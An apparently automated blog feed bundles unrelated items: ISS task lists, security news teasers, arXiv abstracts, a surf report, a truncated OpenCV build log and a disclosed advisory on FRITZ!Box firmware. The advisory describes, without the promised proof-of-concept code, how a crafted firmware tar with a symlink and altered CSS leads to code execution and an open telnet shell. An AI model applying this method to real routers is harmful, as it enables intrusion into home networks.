PILOT-T. Experiment Ops Fluid Shifts – Ultrasound Scan (assistance) MRM1 Fan Screen Cleaning (Group C) Fluid Shifts – CCFP Measurement Ops Battery Charger Battery Swap USND2 – Hardware Deactivation Start BSA Battery Charge JEMAL – Closeout Verification Complete the Dose Tracker application (Subject) Soyuz 718 Samsung Tablet Recharge – terminate JEMAL – JEM Airlock Vent Confirmation Complete the Dose Tracker application (Subject) Verification of ИП-1 Flow Sensor Position MRM1-FGB Screw Clamp Tightening Repair of SM Interior Panel 335 by Installing Overlay Panels – Day 1 EMU backpack replacement PPS – Hardware Checkout Repair of SM Interior Panel 335 by Installing Overlay Panels – Day 1 PPS – KUBIK6 deactivation and stowage EMU Resizing PILOT-T. Experiment Ops Comm config for conference from MRM2 Kulonovskiy Kristall Experiment Run Photo/Video Battery Charger Battery Swap EMU Payload Water Recharge Bag (PWR) De-gas EMU Water Refill PILOT-T. Experiment Ops MRM2 Comm Reconfig for Nominal Ops KULONOVSKIY KRISTALL. Copy and Downlink Data EMU LCVG Water Fill IMS Delta File Prep USOS EVA Tool Config PILOT-T. Closeout Ops СОЖ Maintenance Terminate Photo/Video Battery Charge Preparation of Reports for Roscosmos Web Site and Social Media Video Recording for All-Russia State Television and  Radio Broadcasting Company (ВГТРК) ECON-M. Observations and Photography   Completed Task […]

from ISS On-Orbit Status Report http://ift.tt/1OOM8F5
via IFTTT

Microsoft Collecting More Data of Windows 10 Users than Initially Thought

After several controversial data mining and privacy invasion features within Microsoft's newest operating system, Microsoft continued convincing its users that Windows 10 is not spying on anyone and that the company is not collecting more data than it needs. In addition, Microsoft also updated its privacy policy in order to clear how and when Windows 10 utilizes users' data. But wait,


from The Hacker News http://ift.tt/1OOxxJH
via IFTTT

How to become an Information Security Expert with the CISSP Certification

If you dream of making it big in the IT security community, the CISSP certification is a necessary milestone. Having this certification to your credit portrays a sense of commitment to the security profession and shows potential employers that you have a strong knowledge base to excel in this domain. So if you're considering a certification, read on – we've answered a few questions that


from The Hacker News http://ift.tt/1ISqv4p
via IFTTT

[FD] [RT-SA-2015-001] AVM FRITZ!Box: Remote Code Execution via Buffer Overflow

[FD] [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images

Advisory: AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images The firmware upgrade process of the FRITZ!Box 7490 is flawed. Specially crafted firmware images can overwrite critical files. Arbitrary code can get executed if an attempt is made to install such a manipulated firmware. Details ======= Product: AVM FRITZ!Box 7490, possibly others Affected Versions: versions prior to 6.30 [0] Fixed Versions: >= 6.30 [0] Vulnerability Type: Authenticated Code Execution Security Risk: medium Vendor URL: http://avm.de/ Vendor Status: fixed version released Advisory URL: http://ift.tt/1PgCNA2 Advisory Status: published CVE: CVE-2014-8886 CVE URL: http://ift.tt/1JwdkWA Introduction ============ FRITZ!Box is the brand name of SOHO routers/CPE manufactured by AVM GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a wifi access point, routing, VoIP, NAS and DECT. More Details ============ AVM regularly publishes firmware updates to address bugs and to introduce new features. The firmware image can either be uploaded manually or the FRITZ!Box downloads it semi-automatically from http://download.avm.de/ via unencrypted HTTP if a new version is available. Technically, AVM firmware images are tar files: $ tar --list --file FRITZ.Box_7490.113.06.20.image ./var/ ./var/install ./var/chksum ./var/info.txt ./var/tmp/ ./var/tmp/filesystem.image ./var/tmp/kernel.image ./var/regelex ./var/signature When transferred to the FRITZ!Box, updates are extracted to the root directory before their cryptographic signature is verified. Thus, critical files can be overwritten by specially crafted firmware images. Attackers can use this weakness to execute arbitrary code. For example, the root directory of the web interface is located at /var/html (ramdisk), which is a symlink that points to /usr/www/avm (read-only squashfs). If the victim uploads a tar file that contains a symlink called ./var/html, the web server's root directory is relocated to whatever the malicious symlink points to, e.g. ./var/redteam. There, attackers can place arbitrary content, such as CGIs. Once invoked by a browser, arbitrary code can be executed. As the signature check will inevitably fail, the victim will be asked whether the unsigned firmware image should be processed or not. That confirmation page is formatted by CSS. As a result, the victim's browser will try to reload the main.css, which is now under the control of the attacker. The attacker can manipulate the main.css to trick the victim's browser into loading an attacker-controlled CGI. In total, the upload of a manipulated firmware image can immediately lead to code execution without the need of further action by the victim. Proof of Concept ================ The following command generates a firmware image that leads to code execution when uploaded to a FRITZ!Box 7490. As soon as the FRITZ!Box reports the signature mismatch, a password-less telnetd listening on port 9999 will be started.

Source: Gmail -> IFTTT-> Blogger

EPIC Fail — For the Third Time, Linux Ransomware CRACKED!

Ransomware is now a common practice for money-motivated cyber criminals. It's basically a type of software written in any system-based programming language that has the ability to hijack victim’s computer, encrypts files and then ask for a ransom amount to get them back. One such ransomware dubbed Linux.Encoder targets Linux-powered websites and servers by encrypting MySQL, Apache, and


from The Hacker News http://ift.tt/1kOvOpO
via IFTTT

Hackers Exploit Free SSL Certs from Let's Encrypt to Spread Malware

Who else didn't see this coming? It was so obvious as I stressed earlier that the Let's Encrypt free HTTPS certificates would not just help legitimate website operators to encrypt its users' traffic, but also help criminals to bother innocent users with malware through secure sites. Let's Encrypt allows anyone to obtain free SSL/TLS (Secure Socket Layer/Transport Layer Security)


from The Hacker News http://ift.tt/22MmO6Q
via IFTTT

Comets and Bright Star


This timely, telescopic, two panel mosaic spans about 10 full moons across planet Earth's predawn skies. Recorded as the year began from Tenerife, Canary Islands, near the top of the frame are the faint coma and tail of Comet Borrelly (P/19). A comet with a seven year orbital period, Borrelly's nucleus was visited by the ion propelled spacecraft Deep Space 1 near the beginning of the 21st century. Anchoring the scene at the bottom is brilliant star Arcturus (Alpha Bootes) and Comet Catalina (C/2013 US10) a first time visitor from the Oort Cloud. Catalina's yellowish dust tail extends below and right. Buffeted by winds and storms from the Sun, the comet's complex ion tail sweeps up and toward the right, across most of the field of view. Remarkably, one of the composition's 30 second exposure subframes also caught the trail of a bright meteor, slashing toward the left between comets and bright star. via NASA http://ift.tt/1OA2Wxo

Wednesday, January 6, 2016

Wikiometrics: A Wikipedia Based Ranking System. (arXiv:1601.01058v1 [cs.DL])

We present a new concept - Wikiometrics - the derivation of metrics and indicators from Wikipedia. Wikipedia provides an accurate representation of the real world due to its size, structure, editing policy and popularity. We demonstrate an innovative mining methodology, where different elements of Wikipedia - content, structure, editorial actions and reader reviews - are used to rank items in a manner which is by no means inferior to rankings produced by experts or other methods. We test our proposed method by applying it to two real-world ranking problems: top world universities and academic journals. Our proposed ranking methods were compared to leading and widely accepted benchmarks, and were found to be extremely correlative but with the advantage of the data being publically available.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1JYqdE3
via IFTTT

Some Experimental Issues in Financial Fraud Detection: An Investigation. (arXiv:1601.01228v1 [cs.CR])

Financial fraud detection is an important problem with a number of design aspects to consider. Issues such as algorithm selection and performance analysis will affect the perceived ability of proposed solutions, so for auditors and re-searchers to be able to sufficiently detect financial fraud it is necessary that these issues be thoroughly explored. In this paper we will revisit the key performance metrics used for financial fraud detection with a focus on credit card fraud, critiquing the prevailing ideas and offering our own understandings. There are many different performance metrics that have been employed in prior financial fraud detection research. We will analyse several of the popular metrics and compare their effectiveness at measuring the ability of detection mechanisms. We further investigated the performance of a range of computational intelligence techniques when applied to this problem domain, and explored the efficacy of several binary classification methods.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1mDpqn6
via IFTTT

Angrier Birds: Bayesian reinforcement learning. (arXiv:1601.01297v1 [cs.AI])

We train a reinforcement learner to play a simplified version of the game Angry Birds. The learner is provided with a game state in a manner similar to the output that could be produced by computer vision algorithms. We improve on the efficiency of regular {\epsilon}-greedy Q-Learning with linear function approximation through more systematic exploration in Randomized Least Squares Value Iteration (RLSVI), an algorithm that samples its policy from a posterior distribution on optimal policies. With larger state-action spaces, efficient exploration becomes increasingly important, as evidenced by the faster learning in RLSVI.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1JYqbfo
via IFTTT

Skopus: Exact discovery of the most interesting sequential patterns under Leverage. (arXiv:1506.08009v2 [cs.AI] UPDATED)

This paper presents a framework for exact discovery of the most interesting sequential patterns. It combines (1) a novel definition of the expected support for a sequential pattern - a concept on which most interestingness measures directly rely - with (2) SkOPUS: a new branch-and-bound algorithm for the exact discovery of top-k sequential patterns under a given measure of interest. Our interestingness measure is based on comparing the pattern support with the average support of its sister patterns, obtained by permuting (to certain extent) the items of the pattern. The larger the support compared to the expectation, the more interesting is the pattern. We build on these two elements to exactly extract the k sequential patterns with highest leverage, consistent with our definition of expected support. We conduct experiments on both synthetic data with known patterns and real-world datasets; both experiments confirm the consistency and relevance of our approach with regard to the state of the art.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1TYFP1s
via IFTTT

Ocean City, MD's surf is at least 5.42ft high

Maryland-Delaware, January 10, 2016 at 02:00AM

Ocean City, MD Summary
At 2:00 AM, surf min of 5.42ft. At 8:00 AM, surf min of 5.22ft. At 2:00 PM, surf min of 5.11ft. At 8:00 PM, surf min of 4.42ft.

Surf maximum: 6.46ft (1.97m)
Surf minimum: 5.42ft (1.65m)
Tide height: -0.2ft (-0.06m)
Wind direction: SSW
Wind speed: 17.92 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Re: [opencv] Build error opencv (#5912)

libtiff.dir\Debug\tif_ojpeg.obj libtiff.dir\Debug\tif_open.obj libtiff.dir\Debug\tif_packbits.obj libtiff.dir\Debug\tif_pixarlog.obj libtiff.dir\Debug\tif_predict.obj libtiff.dir\Debug\tif_print.obj libtiff.dir\Debug\tif_read.obj libtiff.dir\Debug\tif_strip.obj libtiff.dir\Debug\tif_swab.obj libtiff.dir\Debug\tif_thunder.obj libtiff.dir\Debug\tif_tile.obj libtiff.dir\Debug\tif_version.obj libtiff.dir\Debug\tif_warning.obj libtiff.dir\Debug\tif_write.obj libtiff.dir\Debug\tif_zip.obj libtiff.dir\Debug\tif_stream.obj libtiff.dir\Debug\tif_win32.obj libtiff.vcxproj -> C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libtiffd.lib FinalizeBuildStatus: Se eliminará el archivo "libtiff.dir\Debug\libtiff.tlog\unsuccessfulbuild". Aplicando tarea Touch a "libtiff.dir\Debug\libtiff.tlog\libtiff.lastbuildstate". Compilación del proyecto terminada "C:\Users\Diego\Documents\OPENCV\build64\3rdparty\libtiff\libtiff.vcxproj" (destinos predeterminados). El proyecto "C:\Users\Diego\Documents\OPENCV\build64\ALL_BUILD.vcxproj" (1) está compilando "C:\Users\Diego\Documents\OPENCV\build64\3rdparty\libwebp\libwebp.vcxproj" (9) en el nodo 1 (destinos predeterminados). PrepareForBuild: Creando directorio "libwebp.dir\Debug\libwebp.tlog\". InitializeBuildStatus: Se creará "libwebp.dir\Debug\libwebp.tlog\unsuccessfulbuild" porque se especificó "AlwaysCreate". CustomBuild: Building Custom Rule C:/Users/Diego/Documents/OPENCV/sources/3rdparty/libwebp/CMakeLists.txt CMake does not need to re-run because C:\Users\Diego\Documents\OPENCV\build64\3rdparty\libwebp\CMakeFiles\generate.stamp is up-to-date. MakeDirsForCl: Creando directorio "C:\Users\Diego\Documents\OPENCV\build64\3rdparty\libwebp\Debug". Creando directorio "C:\Users\Diego\Documents\OPENCV\build64\3rdparty\libwebp\libwebp.dir\Debug\dec". Creando directorio "C:\Users\Diego\Documents\OPENCV\build64\3rdparty\libwebp\libwebp.dir\Debug\enc". ClCompile: C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/dec/alpha.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" / Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\alpha.c alpha.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" /Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\buffer.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\idec.c C:\Users\Diego\Documents\OPENCV\sources\3rdpart y\libwebp\dec\io.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\vp8.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\webp.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\cpu.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\dec.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\dec_neon.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\dec_sse2.c C:\Users\D iego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\enc.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\enc_neon.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\enc_sse2.c C:\Users\Diego\Docum ents\OPENCV\sources\3rdparty\libwebp\dsp\lossless.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\upsampling.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\upsampling_neon.c C:\Users\Diego\D ocuments\OPENCV\sources\3rdparty\libwebp\dsp\upsampling_sse2.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dsp\yuv.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\analysis.c C:\Users\Diego\Docu ments\OPENCV\sources\3rdparty\libwebp\enc\backward_references.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\config.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\cost.c C:\Users\Diego\Docu ments\OPENCV\sources\3rdparty\libwebp\enc\filter.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\histogram.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\iterator.c C:\Users\Diego\Documents\ OPENCV\sources\3rdparty\libwebp\enc\picture.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\syntax.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\token.c C:\Users\Diego\Documents\OPENCV\sour ces\3rdparty\libwebp\enc\webpenc.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\mux\muxedit.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\mux\muxinternal.c C:\Users\Diego\Documents\OPENCV\sources\ 3rdparty\libwebp\mux\muxread.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\utils\bit_reader.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\utils\bit_writer.c C:\Users\Diego\Documents\OPENCV\source s\3rdparty\libwebp\utils\color_cache.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\utils\filters.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\utils\huffman.c C:\Users\Diego\Documents\OPENCV\sour ces\3rdparty\libwebp\utils\huffman_encode.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\utils\quant_levels.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\utils\quant_levels_dec.c C:\Users\Diego\Do cuments\OPENCV\sources\3rdparty\libwebp\utils\rescaler.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\utils\thread.c C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\utils\utils.c buffer.c idec.c io.c vp8.c webp.c cpu.c dec.c dec_neon.c dec_sse2.c enc.c enc_neon.c enc_sse2.c lossless.c upsampling.c upsampling_neon.c upsampling_sse2.c yuv.c analysis.c backward_references.c config.c cost.c filter.c histogram.c iterator.c picture.c syntax.c token.c webpenc.c muxedit.c muxinternal.c muxread.c bit_reader.c bit_writer.c color_cache.c filters.c huffman.c huffman_encode.c quant_levels.c quant_levels_dec.c rescaler.c thread.c utils.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/dec/frame.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" / Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\frame.c frame.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/dec/layer.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" / Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\layer.c layer.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/dec/quant.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" / Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\quant.c quant.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/dec/tree.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" /G d /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\tree.c tree.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/dec/vp8l.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" /G d /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\dec\vp8l.c vp8l.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/enc/alpha.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" / Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\alpha.c alpha.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/enc/frame.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" / Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\frame.c frame.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/enc/layer.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" / Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\layer.c layer.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/enc/quant.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" / Gd /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\quant.c quant.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/enc/tree.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" /G d /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\tree.c tree.c C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /I"C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\cpu-features" /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp /IC:\User s\Diego\Documents\OPENCV\build64 /Zi /nologo /W3 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D _VARIADIC_MAX=10 /D WEBP_USE_TH READ /D "CMAKE_INTDIR=\"Debug\"" /D _MBCS /Gm- /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"libwebp.dir\Debug\/enc/vp8l.c.obj" /Fd"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.pdb" /G d /TC /wd4244 /wd4267 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\3rdparty\libwebp\enc\vp8l.c vp8l.c Lib: C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\Lib.exe /OUT:"C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.lib" /NOLOGO /MACHINE:X64 /machine:x64 libwebp.dir\Debug\buffer.obj libwebp.dir\Debug\idec.obj libwebp.dir\Debug\io.obj libwebp.dir\Debug\vp8.obj libwebp.dir\Debug\webp.obj libwebp.dir\Debug\cpu.obj 